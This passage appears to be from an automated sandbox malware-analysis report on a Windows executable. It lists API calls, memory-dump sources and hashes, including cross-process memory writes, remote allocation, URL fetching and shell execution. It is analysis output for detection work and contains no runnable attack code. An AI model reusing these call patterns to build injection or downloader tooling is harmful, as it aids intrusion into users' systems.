                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2403457894-0
                                                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                        APIs
                                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247068974-0
                                                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: )$U$\
                                                                                                        • API String ID: 0-3705770531
                                                                                                        APIs
                                                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                        • String ID: .lnk
                                                                                                        • API String ID: 886957087-24824748
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \
                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                        Strings
                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                        • API String ID: 708495834-557222456
                                                                                                        APIs
                                                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                        • String ID: @
                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: \$]$h
                                                                                                        • API String ID: 4104443479-3262404753
                                                                                                        APIs
                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                        • String ID: <$@
                                                                                                        • API String ID: 2417854910-1426351568
                                                                                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                        APIs
                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3705125965-3916222277
                                                                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                        APIs
                                                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 135850232-4108050209
                                                                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                        APIs
                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Long
                                                                                                        • String ID: SysTreeView32
                                                                                                        • API String ID: 847901565-1698111956
                                                                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window
                                                                                                        • String ID: SysMonthCal32
                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DestroyWindow
                                                                                                        • String ID: msctls_updown32
                                                                                                        • API String ID: 3375834691-2298589950
                                                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: $<
                                                                                                        • API String ID: 4104443479-428540627
                                                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 1682464887-234962358
                                                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 1682464887-234962358
                                                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
• Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
